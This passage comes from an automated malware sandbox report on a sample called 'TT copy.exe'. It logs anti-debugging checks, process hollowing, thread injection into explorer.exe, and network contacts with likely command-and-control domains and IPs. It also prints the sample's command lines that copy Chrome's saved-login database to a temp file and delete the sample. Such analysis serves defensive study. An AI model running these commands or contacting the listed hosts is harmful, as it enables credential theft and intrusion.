            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138ED6 mov eax, dword ptr fs:[00000030h]3_2_01138ED6
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010936CC mov eax, dword ptr fs:[00000030h]3_2_010936CC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A8EC7 mov eax, dword ptr fs:[00000030h]3_2_010A8EC7
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111FEC0 mov eax, dword ptr fs:[00000030h]3_2_0111FEC0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010776E2 mov eax, dword ptr fs:[00000030h]3_2_010776E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010916E0 mov ecx, dword ptr fs:[00000030h]3_2_010916E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05278D34 mov eax, dword ptr fs:[00000030h]15_2_05278D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0522A537 mov eax, dword ptr fs:[00000030h]15_2_0522A537
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526E539 mov eax, dword ptr fs:[00000030h]15_2_0526E539
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D4D3B mov eax, dword ptr fs:[00000030h]15_2_051D4D3B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D4D3B mov eax, dword ptr fs:[00000030h]15_2_051D4D3B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D4D3B mov eax, dword ptr fs:[00000030h]15_2_051D4D3B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051AAD30 mov eax, dword ptr fs:[00000030h]15_2_051AAD30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B3D34 mov eax, dword ptr fs:[00000030h]15_2_051B3D34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051C7D50 mov eax, dword ptr fs:[00000030h]15_2_051C7D50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E3D43 mov eax, dword ptr fs:[00000030h]15_2_051E3D43
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05223540 mov eax, dword ptr fs:[00000030h]15_2_05223540
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05253D40 mov eax, dword ptr fs:[00000030h]15_2_05253D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CC577 mov eax, dword ptr fs:[00000030h]15_2_051CC577
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CC577 mov eax, dword ptr fs:[00000030h]15_2_051CC577
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DFD9B mov eax, dword ptr fs:[00000030h]15_2_051DFD9B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DFD9B mov eax, dword ptr fs:[00000030h]15_2_051DFD9B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052705AC mov eax, dword ptr fs:[00000030h]15_2_052705AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052705AC mov eax, dword ptr fs:[00000030h]15_2_052705AC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A2D8A mov eax, dword ptr fs:[00000030h]15_2_051A2D8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A2D8A mov eax, dword ptr fs:[00000030h]15_2_051A2D8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A2D8A mov eax, dword ptr fs:[00000030h]15_2_051A2D8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A2D8A mov eax, dword ptr fs:[00000030h]15_2_051A2D8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051A2D8A mov eax, dword ptr fs:[00000030h]15_2_051A2D8A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D2581 mov eax, dword ptr fs:[00000030h]15_2_051D2581
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D2581 mov eax, dword ptr fs:[00000030h]15_2_051D2581
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D2581 mov eax, dword ptr fs:[00000030h]15_2_051D2581
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D2581 mov eax, dword ptr fs:[00000030h]15_2_051D2581
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D1DB5 mov eax, dword ptr fs:[00000030h]15_2_051D1DB5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D1DB5 mov eax, dword ptr fs:[00000030h]15_2_051D1DB5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D1DB5 mov eax, dword ptr fs:[00000030h]15_2_051D1DB5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051D35A1 mov eax, dword ptr fs:[00000030h]15_2_051D35A1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526FDE2 mov eax, dword ptr fs:[00000030h]15_2_0526FDE2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526FDE2 mov eax, dword ptr fs:[00000030h]15_2_0526FDE2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526FDE2 mov eax, dword ptr fs:[00000030h]15_2_0526FDE2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0526FDE2 mov eax, dword ptr fs:[00000030h]15_2_0526FDE2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05258DF1 mov eax, dword ptr fs:[00000030h]15_2_05258DF1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov eax, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov eax, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov eax, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov ecx, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov eax, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226DC9 mov eax, dword ptr fs:[00000030h]15_2_05226DC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051BD5E0 mov eax, dword ptr fs:[00000030h]15_2_051BD5E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051BD5E0 mov eax, dword ptr fs:[00000030h]15_2_051BD5E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05261C06 mov eax, dword ptr fs:[00000030h]15_2_05261C06
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226C0A mov eax, dword ptr fs:[00000030h]15_2_05226C0A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226C0A mov eax, dword ptr fs:[00000030h]15_2_05226C0A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226C0A mov eax, dword ptr fs:[00000030h]15_2_05226C0A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226C0A mov eax, dword ptr fs:[00000030h]15_2_05226C0A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0527740D mov eax, dword ptr fs:[00000030h]15_2_0527740D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0527740D mov eax, dword ptr fs:[00000030h]15_2_0527740D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0527740D mov eax, dword ptr fs:[00000030h]15_2_0527740D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DBC2C mov eax, dword ptr fs:[00000030h]15_2_051DBC2C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DA44B mov eax, dword ptr fs:[00000030h]15_2_051DA44B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DAC7B mov eax, dword ptr fs:[00000030h]15_2_051DAC7B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051C746D mov eax, dword ptr fs:[00000030h]15_2_051C746D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0523C450 mov eax, dword ptr fs:[00000030h]15_2_0523C450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0523C450 mov eax, dword ptr fs:[00000030h]15_2_0523C450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051B849B mov eax, dword ptr fs:[00000030h]15_2_051B849B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264496 mov eax, dword ptr fs:[00000030h]15_2_05264496
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05226CF0 mov eax, dword ptr fs:[00000030h]15_2_05226CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052614FB mov eax, dword ptr fs:[00000030h]15_2_052614FB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05278CD6 mov eax, dword ptr fs:[00000030h]15_2_05278CD6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CF716 mov eax, dword ptr fs:[00000030h]15_2_051CF716
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DA70E mov eax, dword ptr fs:[00000030h]15_2_051DA70E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051DA70E mov eax, dword ptr fs:[00000030h]15_2_051DA70E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051CB73D mov eax, dword ptr fs:[00000030h]15_2_051CB73D
            Source: C:\Users\user\Desktop\TT copy.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0040A150 LdrLoadDll,3_2_0040A150
            Source: C:\Users\user\Desktop\TT copy.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 107.187.232.173 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.huiyi-sui.com
            Source: C:\Windows\explorer.exeDomain query: www.sarrafguler.com
            Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 18.193.36.153 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.130 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 198.44.241.20 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.16.0.13 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.36.145.110 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.pheife.com
            Source: C:\Windows\explorer.exeDomain query: www.sassafrasriver.info
            Source: C:\Windows\explorer.exeNetwork Connect: 185.254.241.173 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.drivetrianrepair.com
            Source: C:\Windows\explorer.exeDomain query: www.theflysnare.com
            Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.237 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.408wmountain.info
            Source: C:\Windows\explorer.exeDomain query: www.shopcycles3.com
            Source: C:\Windows\explorer.exeDomain query: www.sinsegae.net
            Source: C:\Windows\explorer.exeDomain query: www.huayugw.com
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\TT copy.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: FC0000Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\TT copy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\TT copy.exeMemory written: C:\Users\user\Desktop\TT copy.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\TT copy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\TT copy.exeThread register set: target process: 3616Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3616Jump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess created: C:\Users\user\Desktop\TT copy.exe C:\Users\user\Desktop\TT copy.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT copy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
            Source: explorer.exe, 00000007.00000000.409321341.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.334016110.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.401387275.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326475349.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326911519.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.401717230.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
            Source: explorer.exe, 00000007.00000000.289551295.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.326911519.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.401717230.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Users\user\Desktop\TT copy.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
